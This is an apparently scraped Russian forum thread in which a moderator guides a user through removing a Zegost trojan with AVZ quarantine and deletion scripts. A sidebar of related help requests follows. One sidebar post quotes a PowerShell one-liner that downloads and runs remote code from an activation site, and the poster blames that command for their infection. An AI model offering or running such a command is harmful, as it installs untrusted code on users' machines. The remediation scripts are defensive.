Перейти к содержанию

Вирус!

kJIoyH

Рекомендуемые сообщения

В C:\Documents and Settings\Admin создается папка mb в ней откуда то появляются вирусы,аваст орет без остановки удаляю и через некоторое время всё повторяется,паралельно с этит в C:\Documents and Settings\Admin создаются папки 73QW5UF8 AHGMN6K6 CQSCKOJ7 и тому подобными именами...а начинается всё тем что аваст возмущается на C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\ где создаются такие же папки со странными именами....Помогите Плиз.

Сообщение от модератора Mark D. Pearlstone
Не пишите такими буквами.

Хорошо не буду

Вот только что опять C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\UOZSL7L5\D001[1].exe\[Embedded_Ix#06668] имя вируса Win32:Zegost-C [Trj]

virusinfo_syscure.zip

virusinfo_syscheck.zip

hijackthis.log

Изменено пользователем Mark D. Pearlstone

Внимание ! База поcледний раз обновлялась 06.04.2008 необходимо обновить базы при помощи автоматического обновления (Файл/Обновление баз)

Протокол антивирусной утилиты AVZ версии 4.30

Где такую древность скачали?

Скачайте версию 4.35 и сделайте логи. Не забудьте перед стандартными скриптами выполнить: Меню файл - обновление баз

Выполните скрипт в avz

begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\Program Files\Microsoft\svchost.exe','');
QuarantineFile('C:\WINDOWS\System32\wnwapsclib.dll','');
QuarantineFile('c:\windows\system32\bs.dll','');
DeleteFile('C:\WINDOWS\System32\wnwapsclib.dll');
DeleteFile('C:\Program Files\Microsoft\svchost.exe');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\WnwSvc\Parameters','ServiceDll');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

ПК перезагрузится.

Выполнить скрипт в AVZ.

begin
CreateQurantineArchive(RegKeyStrParamRead('HKCU','Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders','Desktop')+'\avz_quarantine.zip');
end.

Карантин сохранится на рабочем столе.

Карантин отправьте на newvirus@kaspersky.com

Сделайте новые логи.

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в

Войти
  • Похожий контент

• fertune
      От fertune
      Когда открываешь диспетчер задач то сначала ЦП грузит на 100% а потом на 10% я посмотрел через dr.web cureit и увидел то что это майнер dialer.exe, смотрел в интернете как пофиксить но никакие способы не помогли(может быть я что то делал неправильно)
      можете помочь с проблемой? Еще я пробовал его фиксить удаляя его но он опять появлялся и грузил ЦП на все 100%.

• Temikst
      От Temikst
      Приветствую. Сын скачивал какую-то программу для игры, как итог словили какой-то вирус. Dr.web ничего не нашел. но обратил внимание что комп стал тупить, до этого не было так
      CollectionLog-2025.02.09-23.46.zip

Даже браузер сильно тормозит. после открывание диспетчер задач сразу же лучше работает\
    • VanyeJ
      От VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
    • TloBeJluTeJlb
      От TloBeJluTeJlb
      Здравствуйте, перед обращением прошерстил темы похожих проблем, но не нашёл своей. John каким-то совершенно непостижимым образом почти не влиял на работоспособность системы, а заметил я его исключительно из-за пропажи доступа к файлам Касперского, который полностью перестал запускаться. 

Побился об ближайшую стену, подумал, прошёлся KVRT, которым ничего не нашло, подумал ещё немного, включил AV_block_remover. Он нашёл, сделал своё дело, но доступ к папке антивируса я всё ещё не получил :D! FRST, от нечего делать, тоже был задействован, но немного опосля. Короче говоря, я, даже после удаления злополучного майнера из системы, не могу получить доступ к своим же файлам.

FRST.txt Fixlog.txt Addition.txt AV_block_remove_2025.01.20-07.45.log
    • foxlape
      От foxlape
      Запустил прогу и комп тупить начал, есть подозрения на вирус. Логи после запуска проги Logfile.rar (Сохранял логи через Processor Monitor)

• Создать...